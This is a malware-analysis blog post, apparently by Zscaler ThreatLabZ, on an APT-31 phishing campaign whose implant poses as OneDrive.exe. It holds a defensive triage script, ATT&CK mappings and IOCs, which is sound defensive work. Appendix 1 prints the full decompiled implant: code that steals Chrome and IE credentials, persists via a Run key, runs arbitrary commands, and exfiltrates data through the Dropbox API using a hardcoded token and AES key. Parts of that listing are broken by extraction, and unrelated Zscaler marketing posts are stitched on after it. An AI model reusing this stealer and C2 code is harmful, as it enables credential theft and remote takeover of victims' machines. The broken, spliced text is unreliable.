It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account. Based on this similarity, we are confident that a first-stage payload was involved that downloads and executes the MSI files.

All the MSI files were created using MSI Wrapper software, which helps to convert an executable file to an MSI file. With MSI Wrapper, you can include other files in the same MSI package and execute them along with the main executable. Figure 6 shows the MSI Wrapper splash screen displayed to the user upon execution.

Figure 6: MSI Wrapper splash screen displayed to the user.

Upon execution, the MSI binary drops and executes the main payload, which is a Python-compiled binary, and also opens the dropped decoy PDF file, which is displayed to the user.

Python-compiled binary

The MSI file described above drops a Python-compiled binary in the AppData\Roaming directory, which is used to perform further malicious activities.

MD5 hash: bd26122b29ece6ce5abafb593ff7b096
Filename: OneDrive.exe

For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee’s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications.
Since this binary was built with the PyInstaller packager, which compiles the Python script into a standalone executable, we can extract the compiled Python script (*.pyc) from the package and use a decompiling tool such as uncompyle6 to recover its contents. The complete decompiled script is included in Appendix I. Below are some of the key functionalities of the binary.

1. Check and use the proxy configuration: Checks whether a proxy is configured using the registry value “ProxyEnable”, located under the registry key “Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings”. If so, the proxy server information is obtained from the registry value “ProxyServer” under the same key. This proxy server is later used for all the C&C communication.

2. Browser credential stealing: Capability to steal credentials (username and password) from the installed browsers, Microsoft Internet Explorer (MSIE) and Google Chrome. Figures 7 and 8 show the code sections responsible for stealing the credentials from MSIE and Chrome respectively.

Figure 7: Code section used to steal MSIE credentials.

Figure 8: Code section used to steal Chrome browser credentials.

3. Persistence: Creates a Windows Run registry value for persistence. The name of the value is "Dropbox Update Setup"; this name was consistent across all the samples. It points to the location of the Python-compiled binary in the %appdata% directory to ensure that it is started automatically each time the system is rebooted.

4. Bot identifier generation: Generates a unique ID (uuid) for the machine, which is used to register the bot with the attacker's C&C server.

uniqueid = str(uuid.uuid5(uuid.NAMESPACE_DNS, str(uuid.getnode())))

5. Registration of bot: Collects the following information from the machine to register the bot with the C&C server.

- System information: details of the processor architecture
- Current timestamp, in the format %Y-%m-%d %H:%M:%S
- System name
- Username of the machine

It collects this information in JSON format, AES-encrypts it, and sends it to the attacker's server using the Dropbox API.

6. Command-and-control activities: After registering the bot with the attacker's server, it checks for new jobs by querying the Dropbox API endpoint:

There are three main commands supported in the script:

a) upload
b) download
c) cmd: a system command to be executed on the endpoint. The Python script executes it using subprocess.Popen().

The results are stored in JSON format, AES-encrypted, and sent as an attachment using the Dropbox API.

JSON format:

{u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'file': self.attachment, u'msg': self.text}

Here, text indicates the output of the command executed on the endpoint.

The filename format used is: back#<unique_id>#<job_id>#.txt

Zscaler Cloud Sandbox detection

Figure 9 shows the sandbox detection for the final payload, which is a Python-compiled binary.

Figure 9: Zscaler Cloud Sandbox detection.

Conclusion

The threat actor, APT-31, quickly leverages current themes, such as COVID-19, or political themes of interest to the victim as a social engineering technique to infect their machines. By abusing legitimate services such as GitHub, Google Drive, and Dropbox in the infection chain, end-to-end, this threat actor manages to evade network security solutions.

As always, users should be cautious when receiving emails out of the blue, even if those emails appear to be related to something you are interested in, such as information about a COVID-19 vaccine.

The Zscaler ThreatLabZ team will continue to monitor this campaign, as well as others, to help keep our customers safe.
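The host-based artifacts described in the technical analysis (the "Dropbox Update Setup" Run value, the spoofed OneDrive.exe/siHostx64.exe dropped under AppData\Roaming, the MD5 hashes, the uuid5 bot identifier, and the back#<unique_id>#<job_id>#.txt result file names) can be turned into a triage check for an incident responder. The following script is an added example, not ThreatLabZ or Zscaler code. The indicator values come from this analysis; the exported Run-key entries, file list and MAC address are constructed, and the heuristic that one of the dropped binary names autostarting from AppData\Roaming is suspicious (the real OneDrive client runs from AppData\Local) is this example's assumption.

```python
"""Host triage for the implant described above.

Added example: matches exported Run-key entries and file hashes against the
indicators in this analysis, and reproduces the implant's bot identifier so
that back#<unique_id>#<job_id>#.txt result files can be tied to a host.
"""

import re
import uuid

# Indicators taken from the analysis above.
RUN_VALUE_NAME = "Dropbox Update Setup"
DROPPED_BINARIES = {"onedrive.exe", "sihostx64.exe"}
MSI_MD5S = {
    "077ebc3535b38742307ef1c9e3f95222", "f3896d4a29b4a2ea14ea8a7e2e500ee5",
    "b4112b0700be2343422c759f5dc7bb8b", "daa7045a5c607fc2ae6fe0804d493cea",
    "3347a1409f0236904beaceba2c8c7d56",
}
PAYLOAD_MD5S = {"bd26122b29ece6ce5abafb593ff7b096", "fc4995e931f0ff717fe6a6189f07af64"}
# Result files the implant uploads are named back#<unique_id>#<job_id>#.txt
RESULT_NAME = re.compile(r"^back#(?P<uid>[0-9a-f-]{36})#(?P<job>[^#]+)#\.txt$", re.IGNORECASE)
EXE_IN_COMMAND = re.compile(r'([^\\/"]+\.exe)', re.IGNORECASE)


def bot_id_from_mac(mac):
    """Reproduce uniqueid = uuid5(NAMESPACE_DNS, str(uuid.getnode())).

    uuid.getnode() is the MAC address as a 48-bit integer, so deriving that
    integer from a MAC string yields the same value the implant computes.
    """
    node = int(re.sub(r"[:-]", "", mac), 16)
    return str(uuid.uuid5(uuid.NAMESPACE_DNS, str(node)))


def parse_result_name(filename):
    """Return (bot_id, job_id) for a back#<uid>#<job>#.txt name, else None."""
    m = RESULT_NAME.match(filename)
    return (m.group("uid").lower(), m.group("job")) if m else None


def check_run_keys(entries):
    """entries: (value_name, command) pairs exported from the HKCU Run key.

    Flags the persistence value name used by every sample and, as this
    example's own heuristic, any of the spoofed binary names autostarting from
    AppData\\Roaming, where the implant copies itself.
    """
    findings = []
    for name, command in entries:
        exe = EXE_IN_COMMAND.search(command)
        target = exe.group(1).lower() if exe else ""
        if name == RUN_VALUE_NAME:
            findings.append(("run_value_name", name, command))
        elif target in DROPPED_BINARIES and "\\appdata\\roaming\\" in command.lower():
            findings.append(("spoofed_binary", target, command))
    return findings


def check_files(files):
    """files: (path, md5) pairs. Returns (path, category) for known hashes.

    An MSI hash under a .pdf name is exactly the spoofed extension described above.
    """
    findings = []
    for path, md5 in files:
        h = md5.lower()
        if h in MSI_MD5S:
            findings.append((path, "msi"))
        elif h in PAYLOAD_MD5S:
            findings.append((path, "payload"))
    return findings


# Constructed host data for demonstration, not from a real incident.
SAMPLE_RUN_ENTRIES = [
    ("OneDrive", '"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'),
    ("Dropbox Update Setup", "C:\\Users\\alice\\AppData\\Roaming\\OneDrive.exe"),
    ("Updater", "C:\\Users\\alice\\AppData\\Roaming\\siHostx64.exe"),
]
SAMPLE_FILES = [
    ("C:\\Users\\alice\\Downloads\\covid_19_vaccines_final.pdf", "f3896d4a29b4a2ea14ea8a7e2e500ee5"),
    ("C:\\Users\\alice\\AppData\\Roaming\\OneDrive.exe", "bd26122b29ece6ce5abafb593ff7b096"),
    ("C:\\Windows\\notepad.exe", "00000000000000000000000000000000"),  # placeholder benign hash
]
SAMPLE_MAC = "00:11:22:33:44:55"  # constructed


def triage(run_entries=SAMPLE_RUN_ENTRIES, files=SAMPLE_FILES, mac=SAMPLE_MAC):
    """Bundle the checks; bot_id lets back#<uid> files be matched to this host."""
    return {
        "run_keys": check_run_keys(run_entries),
        "files": check_files(files),
        "bot_id": bot_id_from_mac(mac),
    }


if __name__ == "__main__":
    for section, result in triage().items():
        print(section, result)
```

On a live Windows host the Run-key pairs would come from an export of HKCU\Software\Microsoft\Windows\CurrentVersion\Run and the hashes from a file-system sweep; the legitimate OneDrive entry in the sample data is there to show that the name alone is not enough and the location under AppData\Roaming is what separates the implant from the real client.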
MITRE ATT&CK table

ID        | Technique                                | Description
T1566.002 | Spearphishing Link                       | Email body contains a link to an attacker-hosted file
T1204.002 | User Execution: Malicious File           | User downloads and opens the attacker-hosted file
T1059.003 | Windows Command Shell                    | Executes the commands fetched from the C2
T1140     | Deobfuscate/Decode Files or Information  | Strings and other data are obfuscated in the payload
T1547.001 | Registry Run Keys / Startup Folder       | Creates a Run registry key for persistence
T1555.003 | Credentials from Web Browsers            | Steals credentials from Internet Explorer and Chrome
T1082     | System Information Discovery             | Sends processor architecture and computer name
T1083     | File and Directory Discovery             | Uploads files from the victim machine
T1033     | System Owner/User Discovery              | Sends the username of the currently logged-in user
T1124     | System Time Discovery                    | Sends the current system time
T1005     | Data from Local System                   | Uploads files from the victim machine
T1132.001 | Standard Encoding                        | Uses AES encryption for C2 communication
T1090.001 | Internal Proxy                           | Uses the user-configured proxy from the registry if available
T1567.002 | Exfiltration to Cloud Storage            | Data is uploaded to Dropbox via its API

Indicators of Compromise

Host-based indicators

MD5 hashes of MSI files:
077ebc3535b38742307ef1c9e3f95222
f3896d4a29b4a2ea14ea8a7e2e500ee5
b4112b0700be2343422c759f5dc7bb8b
daa7045a5c607fc2ae6fe0804d493cea
3347a1409f0236904beaceba2c8c7d56

MD5 hashes of Python-compiled binaries:
bd26122b29ece6ce5abafb593ff7b096
fc4995e931f0ff717fe6a6189f07af64

Dropped Python-compiled binary file names:
OneDrive.exe
siHostx64.exe

Dropped decoy file names:
mcafee_trial_setup_433.0207.3919_key.exe
PAPER-COVID-19-Vaccine-Strategy.pdf
covid_19_vaccines_final.pdf
FINAL__-COVID-Vaccine-Letter.pdf
200709-The-Publics-Role-in-COVID-19-Vaccination.pdf

LNK file metadata analysis

# This LNK was used by the threat actor in 2019
LNK file MD5 hash: 817837e0609b5bdade503428dd17514e
# LNK file was generated inside a VMWare virtual machine by the attacker
# These details were extracted
from the LNK file using the LECmd tool.

Tracker database block
Machine ID: desktop-fe0haua
MAC Address: 00:0c:29:51:de:79
MAC Vendor: VMWARE
Creation: 2019-10-29 02:05:30

Network-based indicators
Github URL hosting MSI file: hxxps:// hxxps://
Attacker-controlled Github account names: yandexmcf1 protonshshll

References

Appendix 1: Python decompiled code

# The decompiled Python code is consistent among all the samples. The only change we observed was in the access token. Even the AES encryption key is shared between all the samples.
# Note on the listing: several dotted identifiers (the Dropbox API base URLs, the cipher constructor, the HTTP POST call and one attribute name) were dropped when the page was extracted; those spots are marked with a comment and left as they appear on the page.

import requests, json, win32cred, sqlite3, win32crypt, subprocess, sys, os, threading, time, platform, uuid, base64, time
from Crypto import Random
from Crypto.Cipher import AES
from _winreg import *

time.sleep(480)
access_token = 'XAdmrYKoIiAAAAAAAAAADSEB3W3JCY6-pc1tD0zTp2upliDsO9vNrjfjIDJae_Ii'
api_url = ''      # Dropbox API base URL, stripped during extraction
content_url = ''  # Dropbox content base URL, stripped during extraction
respath = '/res'
jobpath = '/job'
respath_s = '/res/'
jobpath_s = '/job/'
proxies = {}
uniqueid = str(uuid.uuid5(uuid.NAMESPACE_DNS, str(uuid.getnode())))
BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[(-1)])]


class AESCipher:

    def __init__(self):
        self.key = 'ApmcJue1570368JnxBdGetr*^#ajLsOw'

    def encrypt(self, raw):
        raw = pad(raw)
        iv = cipher =, AES.MODE_CBC, iv)  # IV generation and cipher constructor dropped during extraction
        return base64.b64encode(iv + cipher.encrypt(raw))

    def decrypt(self, enc):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        cipher =, AES.MODE_CBC, iv)  # cipher constructor dropped during extraction
        return unpad(cipher.decrypt(enc[16:]))


aesciper = AESCipher()


class regthread(threading.Thread):

    def __init__(self):
        threading.Thread.__init__(self)
        self.tempdir = os.getenv('AppData')
        self.fileName = sys.argv[0]
        self.regpath = os.path.join(self.tempdir, os.path.basename(self.fileName))
        self.runs = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'
 = 'Dropbox Update Setup'  # attribute name dropped during extraction (the same attribute is used in run() below)
        self.daemon = False
        self.start()

    def run(self):
        os.popen('copy %s %s /y' % (self.fileName, self.tempdir))
        key = OpenKey(HKEY_CURRENT_USER, self.runs)
        while True:
            runkey = []
            try:
                i = 0
                while True:
                    subkey = EnumValue(key, i)
                    runkey.append(subkey[0])
                    i += 1
            except Exception as e:
                pass
            if not in runkey:  # attribute name dropped during extraction
                time.sleep(10)
                try:
                    key = OpenKey(HKEY_CURRENT_USER, self.runs, 0, KEY_ALL_ACCESS)
                    SetValueEx(key,, 0, REG_SZ, self.regpath)  # attribute name dropped during extraction
                    key.Close()
                except Exception as e:
                    pass
            time.sleep(10)


def get_proxyserver():
    try:
        aReg = ConnectRegistry(None, HKEY_CURRENT_USER)
        aKey = OpenKey(aReg, 'Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings')
        subCount, valueCount, lastModified = QueryInfoKey(aKey)
        for i in range(valueCount):
            n, v, t = EnumValue(aKey, i)
            if n == 'ProxyServer':
                if ';' in v:
                    slist = v.split(';')
                    for i in slist:
                        if 'http=' in i:
                            server = i.split('=')[1]
                        else:
                            server = ''
                elif '=' in v:
                    server = v.split('=')[1]
                else:
                    server = v
        CloseKey(aKey)
        return server
    except Exception as e:
        return ''
    return


def check_proxy():
    try:
        aReg = ConnectRegistry(None, HKEY_CURRENT_USER)
        aKey = OpenKey(aReg, 'Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings')
        subCount, valueCount, lastModified = QueryInfoKey(aKey)
        for i in range(valueCount):
            n, v, t = EnumValue(aKey, i)
            if n == 'ProxyEnable':
                isproxy = v
        CloseKey(aKey)
        return isproxy
    except Exception as e:
        return 0
    return


def get_ie_creds(server):
    proxycreds = []
    if ':' in server:
        server = server.split(':')[0]
    try:
        creds = win32cred.CredEnumerate(None, 1)
        for i in creds:
            if server in i['TargetName']:
                user = i['UserName']
                passwd = i['CredentialBlob'].replace('\x00', '')
                dic = {user: passwd}
                proxycreds.append(dic)
        return proxycreds
    except Exception as e:
        return proxycreds
    return


def get_chrome_creds(server):
    path = os.getenv('APPDATA') + '\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'
    creds = []
    if ':' in server:
        server = server.split(':')[0]
    try:
        conn = sqlite3.connect(path)
        cursor = conn.cursor()
        cursor.execute('SELECT action_url, username_value, password_value FROM logins')
        data = cursor.fetchall()
        if len(data) > 0:
            for result in data:
                if result[0] == server:
                    password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
                    if password:
                        dic = {result[1]: password}
                        creds.append(dic)
        return creds
    except Exception as e:
        return creds
    return


def check_cred(server, creds):
    global proxies
    pro = {}
    url = ''  # connectivity-check URL, stripped during extraction
    if server:
        if creds:
            for userdic in creds:
                for user in userdic:
                    pro['http'] = 'http://' + user + ':' + userdic[user] + '@' + server
                    pro['https'] = 'https://' + user + ':' + userdic[user] + '@' + server
                    r = requests.get(url, proxies=pro)
                    if r.status_code == 200:
                        proxies = pro
                        return 1
        else:
            pro['http'] = 'http://' + server
            pro['https'] = 'https://' + server
            r = requests.get(url, proxies=pro)
            if r.status_code == 200:
                proxies = pro
                return 1
    return 0


def do_post(url, headers, data, proxy):
    if proxy:
        r =, headers=headers, data=data, proxies=proxies)  # HTTP POST call dropped during extraction
        if 'download' in url:
            return r.content
        if 'upload' in url:
            return r.content
        return json.loads(r.content)
    else:
        r =, headers=headers, data=data)  # HTTP POST call dropped during extraction
        if 'download' in url:
            return r.content
        if 'upload' in url:
            return r.content
        return json.loads(r.content)


def search(path, query, proxy):
    headers = {'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/json'}
    data = {'path': path, 'query': query, 'mode': {'.tag': 'filename'}}
    r = do_post(api_url + 'search', headers, json.dumps(data), proxy)
    return r


def download(filepath, proxy):
    headers = {'Authorization': 'Bearer ' + access_token, 'Dropbox-API-Arg': '{"path":"%s"}' % filepath}
    r = do_post(content_url + 'download', headers, '', proxy)
    return r


def upload(data, filepath, proxy):
    headers = {'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/octet-stream', 'Dropbox-API-Arg': '{"path":"%s"}' % filepath}
    r = do_post(content_url + 'upload', headers, data, proxy)
    return r


def delete(filepath, proxy):
    headers = {'Authorization': 'Bearer XAdmrYKoIiAAAAAAAAAADSEB3W3JCY6-pc1tD0zTp2upliDsO9vNrjfjIDJae_Ii', 'Content-Type': 'application/json'}
    data = {'path': filepath}
    r = do_post(api_url + 'delete', headers, json.dumps(data), proxy)
    return r


class Download(threading.Thread):

    def __init__(self, jobid, filepath, proxy):
        threading.Thread.__init__(self)
        self.jobid = jobid
        self.filepath = filepath
        self.daemon = True
        self.proxy = proxy
        self.start()

    def run(self):
        try:
            if os.path.exists(self.filepath) is True:
                Sendmsg({u'cmd': u'download', u'res': u'Download file success...'}, self.proxy, self.jobid, self.filepath)
            else:
                Sendmsg({u'cmd': u'download', u'res': u'Path to file invalid'}, self.proxy, self.jobid)
        except Exception as e:
            Sendmsg({u'cmd': u'download', u'res': (u'Failed: {}').format(e)}, self.proxy, self.jobid)


class Upload(threading.Thread):

    def __init__(self, jobid, dest, attachment, proxy):
        threading.Thread.__init__(self)
        self.jobid = jobid
        self.dest = dest
        self.attachment = attachment
        self.daemon = True
        self.proxy = proxy
        self.start()

    def run(self):
        try:
            file_content = download(jobpath_s + self.attachment, self.proxy)
            fopen = open(self.dest, 'wb+')
            fopen.write(file_content)
            fopen.close()
            Sendmsg({u'cmd': u'upload', u'res': u'Upload file success ,saved to %s' % self.dest}, self.proxy, self.jobid)
        except Exception as e:
            Sendmsg({u'cmd': u'upload', u'res': (u'Upload file Failed: {}').format(e)}, self.proxy, self.jobid)


class execCmd(threading.Thread):

    def __init__(self, command, jobid, proxy):
        threading.Thread.__init__(self)
        self.command = command
        self.jobid = jobid
        self.daemon = True
        self.proxy = proxy
        self.start()

    def run(self):
        try:
            proc = subprocess.Popen(self.command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            stdout_value = unicode(, errors='ignore')
            stdout_value += unicode(, errors='ignore')
            Sendmsg({'cmd': self.command, 'res': stdout_value}, self.proxy, jobid=self.jobid)
        except Exception as e:
            pass


def getdate():
    return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))


def getUser():
    return os.environ.get('USERNAME')


def getComputername():
    return os.environ.get('COMPUTERNAME')


def getSysinfo():
    return ('{}-{}').format(platform.platform(), os.environ['PROCESSOR_ARCHITECTURE'])


def uploadfiles(filename, proxy):
    try:
        if search(respath, os.path.basename(filename), proxy)['matches']:
            delete(respath_s + os.path.basename(filename), proxy)
        fopen = open(filename, 'rb').read()
        upload(fopen, respath_s + os.path.basename(filename), proxy)
    except Exception as e:
        pass


def msgparse(path, proxy):
    try:
        msg = download(path, proxy)
        return json.loads(aesciper.decrypt(msg))
    except Exception as e:
        return False


class Sendmsg(threading.Thread):

    def __init__(self, text, proxy, jobid='', attachment=''):
        threading.Thread.__init__(self)
        self.text = text
        self.jobid = jobid
        self.attachment = attachment
        self.proxy = proxy
        self.daemon = True
        self.start()

    def run(self):
        filename = uniqueid
        filename = (u'back#{}#{}#.txt').format(uniqueid, self.jobid)
        file_content = json.dumps({u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'file': self.attachment, u'msg': self.text})
        if self.attachment:
            if os.path.exists(self.attachment) == True:
                file_content = json.dumps({u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'file': os.path.basename(self.attachment), u'msg': self.text})
                uploadfiles(self.attachment, self.proxy)
        while True:
            try:
                if search(respath, filename, self.proxy)['matches']:
                    delete(respath_s + filename, self.proxy)
                upload(aesciper.encrypt(file_content), respath_s + filename, self.proxy)
                break
            except Exception as e:
                time.sleep(10)


def checkJobs(proxy):
    while True:
        try:
            joblist = search(jobpath, uniqueid, proxy)
            for job in joblist['matches']:
                msg = msgparse(job['metadata']['path_lower'], proxy)
                jobid = job['metadata']['path_lower'].split('#')[2]
                if msg:
                    cmd = msg['cmd']
                    arg = msg['arg']
                    if cmd == 'download':
                        Download(jobid, arg, proxy)
                    elif cmd == 'upload':
                        Upload(jobid, arg, msg['file'], proxy)
                    elif cmd == 'cmd':
                        execCmd(arg, jobid, proxy)
                try:
                    delete(job['metadata']['path_lower'], proxy)
                except Exception as e:
                    pass
            time.sleep(10)
        except Exception as e:
            time.sleep(10)


def call_online(proxy):
    info = {u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser()}
    filename = ('online#{}#.txt').format(uniqueid)
    file_content = json.dumps({u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'msg': info})
    while True:
        try:
            if search(respath, filename, proxy)['matches']:
                delete(respath_s + filename, proxy)
            upload(aesciper.encrypt(file_content), respath_s + filename, proxy)
            break
        except Exception as e:
            time.sleep(10)


def startbot(proxy):
    regthread()
    call_online(proxy)
    try:
        checkJobs(proxy)
    except Exception as e:
        pass


if __name__ == '__main__':
    isproxy = check_proxy()
    if isproxy:
        try:
            server = get_proxyserver()
            ie_creds = get_ie_creds(server)
            if ie_creds:
                flag = check_cred(server, ie_creds)
                if flag:
                    startbot(isproxy)
                else:
                    startbot(not isproxy)
            else:
                chrome_creds = get_ie_creds(server)
                if chrome_creds:
                    flag = check_cred(server, chrome_creds)
                    if flag:
                        startbot(isproxy)
                    else:
                        startbot(not isproxy)
                else:
                    flag = check_cred(server, [])
                    if flag:
                        startbot(isproxy)
                    else:
                        startbot(not isproxy)
        except Exception as e:
            startbot(0)
    else:
        startbot(isproxy)

Sudeep Singh

The Formula for Flawless Data Protection

Your data is under attack. That statement shouldn’t take anyone by surprise. But do you have the right data protection platform in place to keep your data safe? Judging by recent news reports and statistics, the answer is…no.

An ongoing problem

Reports of data breaches seem to make the news on a daily basis. While writing this blog, a report broke about a cyberattack on London’s Hackney Borough. While details of the attack are limited and an investigation by the UK National Cyber Security Centre has just begun, Philip Glanville, Mayor of Hackney, noted that, once the attack was discovered, one of his first priorities was “protecting data.” Data is what cybercriminals are targeting.
After all, data has become the currency for these bad actors. Once your data is in their hands, they can sell it on the dark web or hold it for ransom until you pay to get it back. That’s why attacks persist. So much so that organizations today are more likely to get hit with an attack than in previous years.

And these data breaches are more than an annoyance or an IT headache. They can be incredibly costly to organizations. A 2019 study from the Ponemon Institute, which surveyed 507 companies that had suffered a data breach, revealed that the average cost of a data breach to companies is $3.92 million globally. And that doesn’t take into account other costs—specifically the broken trust of your customers and employees whose personal data winds up in the hands of cybercriminals. That could cause irreparable harm to your brand and business.

So, for those who have been hit with a data breach, you are not alone. And, for those who haven’t been hit with a data breach, there's a good possibility that you will be.

A failed experiment

If they are being honest, IT and security professionals will tell you that protecting data used to be easier—back in the days when all data was housed in the data center and employees worked in the office. However, as applications move to the cloud and employees are working from practically anywhere, legacy security procedures have proven inadequate. Security can no longer be static. It has to go where your employees go and where your data goes, especially when your employees drop off the corporate network, away from your security controls.

In response, organizations have looked to the cloud for help. But as in just about any industry, not all solutions are the same, with some promising more than they can deliver.

The right formula

When looking for a cloud security provider, organizations need to be wary of vendors that simply spin up virtual instances of their hardware-based systems.
These systems suffer from the same problems as their terrestrial counterparts. Only a purpose-built cloud offering can provide the type of security your data, business, and employees need. That offering needs to include enterprise-grade data security built on an inline data protection architecture that scales to enable organizations to inspect all SSL-encrypted traffic. This is critical because, at the beginning of October 2020, 95 percent of all traffic on Google was encrypted. If your system can’t inspect all SSL traffic, you are blind to the threats that could be hiding there.

To ensure strong data protection, organizations need to look for a cloud security platform that includes the following three essential elements:

- A purpose-built SASE architecture.
- The best context for better data classification.
- A unified platform that protects all channels.

Let’s take a closer look at each of these.

A purpose-built SASE architecture: Organizations often use cloud access security broker (CASB) and data loss protection (DLP) tools as part of their data protection strategy. But for these solutions to perform at the highest level, they require full SSL inspection—something appliances just can’t deliver. A purpose-built SASE cloud platform is the first requirement to deliver high-performing, always-on secure connections no matter the user’s location. SASE unifies all CASB, DLP, and security services into a globally distributed cloud platform so you get less complexity, better data protection, and a fast user experience.

The best context for better data classification: To properly classify the data you have, you need context, but it’s the quality of context that helps you make the best, most informed decisions. Today, your data moves across hundreds of channels—from cloud apps to public clouds to file-sharing platforms. And all the context you need in those channels is hiding inside SSL encryption.
A data protection platform must have visibility into all SSL traffic, which provides organizations with a treasure trove of context.

A unified platform that protects all channels: Protecting your data from leakage and exfiltration requires security to be everywhere your data is. If you can’t control every channel, your data is vulnerable and exposed to potential threats. Also, if you can’t unify all CASB and DLP protections into one platform, you’ve made things way too complex. Without a single platform view, you end up with a disjointed policy, security gaps, and a greater propensity for costly configuration mistakes.

When these critical elements are part of a security platform built specifically for the cloud, you get data protection that meets the needs of today’s world. Your data is protected wherever it is and wherever your employees access it. And you won’t become another story that pops up on my news feed.

Want to learn more? Check out our latest report on flawless data protection.

Steve Grossenbacher is a director of product marketing at Zscaler.

Steve Grossenbacher

Measuring Your Attackable Threat Surface With the Zscaler Internet Attack Surface Analysis Tool

This was originally published on LinkedIn on October 13, 2020.

Did you leave the window open? Lock the door? The invitations to cyberattacks are there. And bad actors can see them. But can you?

Few enterprises have a solid grasp of their own vulnerability to cyberattacks. Attackers seek entrance in the form of enterprise IP addresses and namespaces exposed to the open internet. Each of those exposed addresses represents a metaphorical door into your corporate network and systems, and threat actors quickly identify which of those metaphorical doors aren't locked. (Of course, once through the door, the hackers have run of the corporate house.)

Traditional network security attempts to address those vulnerabilities by "listening" to inbound connections to identify incoming threats.
There's a frustrating irony to this: This “listening” approach to network security exposes yet more IP addresses and namespaces to the outside (read: hostile) world. This leaves servers vulnerable to attack and exposes your internal applications, data, systems, resources, and other proprietary assets.

Enterprise IT leads have a responsibility to understand the extent of their own exposure and then mitigate the risk associated with that vulnerability. CISOs must be able to answer the question "How many doors did I leave open?" Or perhaps more appropriately, "How many of those doors can bad actors see?"

There hasn't been a constructive way to measure an organization's vulnerability to attack from outside. Until now.

At this week's Zscaler CXO Summit, I had the privilege to demo Zscaler's Internet Attack Surface Analysis Tool. The Internet Attack Surface Analysis Tool is free and available now on the Zscaler website.

The Internet Attack Surface Analysis Tool assesses and then quantifies an organization's network exposure risk. In this way, it conceptualizes an organization's attack surface, giving IT leads information to reduce risk.

A few important caveats:

- The Internet Attack Surface Analysis Tool performs its analysis functions without actively scanning or connecting to a customer’s network(s). It queries only passively available information sources.
- Zscaler validates all scan requests to ensure that users can only scan their own organization.

The Internet Attack Surface Analysis Tool does more than "count doors." It performs a comprehensive network exposure audit, identifying:

- Known vulnerabilities: These are security flaws with known exploits and represent a huge risk to enterprise cybersecurity.
- SSL/TLS risks: Systems with outdated encryption protocols are tempting attack targets for hackers.
- Exposed servers: Servers that are open to the internet are an entry point for threat actors seeking to move east/west within a corporate network perimeter.
- Namespace exposure: Keywords associated with a namespace divulge information about applications and systems, and represent an unintended (and often overlooked) risk to the company.
- Public cloud instances: When not closely managed, public cloud instances associated with an organization can become an attack vector. Companies with active "shadow IT" efforts are particularly vulnerable.

The Internet Attack Surface Analysis Tool produces an extensive report that quantifies an organization's attack surface based on the assessment criteria above, as well as several other performance and exposure metrics. It also recommends detailed mitigation strategies for each risk measurement.

Let's look at a snippet of an example output report:

This is a real-world example from an assessment performed on an anonymized Fortune 500 company. "Acme Corp." is vulnerable to attack. It has a sizable attackable surface area and a dangerous network exposure risk. The assessment calls out Acme's out-of-date encryption protocols. But of particular note are the "Known Vulnerabilities" to critically severe threats: Acme Corp. has not kept up with its security patching.

Hackers attack what they can see. Connectivity shouldn’t require exposure, yet it does when enterprises connect outdated legacy network architectures to the internet. Connectivity must be inside-out, not outside-in. Cloud-based ZTNA/SASE solutions, such as the Zscaler Zero Trust Exchange platform, employ the internet to supplant perimeter-based security, enabling (and more importantly, securing) direct, one-to-one connectivity between user and resource. It's a model that secures the way people actually work and obscures corporate systems from the outside world.

The Internet Attack Surface Analysis Tool identifies enterprise vulnerabilities. But it's only a first step toward strengthening an enterprise's threat posture. The object lesson here is embodied in Acme Corp. After its Zscaler-enabled digital transformation, Acme Corp.
re-ran its Internet Attack Surface Analysis Tool assessment. The result? A “LOW” risk assessment and a greatly reduced attack surface.

Watch my CXO Summit innovation showcase presentation here. And learn more about the Internet Attack Surface Analysis Tool here.

Patrick Foxhoven is the Chief Information Officer and EVP Emerging Technologies at Zscaler.

Patrick Foxhoven

Zenith Live 2020: Beyond the Limits of Legacy Thinking

This post also appeared on LinkedIn on October 17, 2020.

The way the world works has changed. And so has the way we put on conferences.

In the last two years, I've had the great privilege to meet and engage directly with Zscaler customers, partners, and innovators at Zenith Live, Zscaler's annual conference and the world's premier global cloud summit. I've been joined on stage by tech leaders from companies that include Siemens, GE, Microsoft, Orange Business Services, Carlsberg, Mars, AIG, Hyatt, Cushman & Wakefield, MAN Energy Systems, and so many more.

Zenith Live 2020 will understandably be different, and I look forward to the day when we can all meet in person once again. But I am thrilled about the agenda the team has put together—the speakers, the training, and, above all, the chance we'll all have to explore the ways various organizations are accelerating transformation to achieve their goals.

This year, Zenith Live 2020 goes virtual December 8–10: All sessions will be offered online, and attendance is free. I invite you to join me and IT leaders and practitioners like you who are creating real change in their organizations by leading the drive to a mobile, cloud-first future.

The theme of Zscaler's third annual cloud conference is “Beyond Limits.” That's an especially apt ideal today: The new IT enables business growth, but only when leaders look beyond the limits of legacy systems, legacy security, and legacy thinking to advance a cloud-first future.

We've all had to pivot.
But in change lies opportunity, and agile IT leaders are seizing this moment to accelerate secure digital transformation. Now, we have the chance to learn from them: Zenith Live 2020 will feature inspiring speakers and practical training for CXOs, IT execs, network architects, security managers, and business leaders. There's something for everyone:

- Hands-on training classes for cloud-security beginners and masters alike, with curricula for network, security, and ZPA tracks.
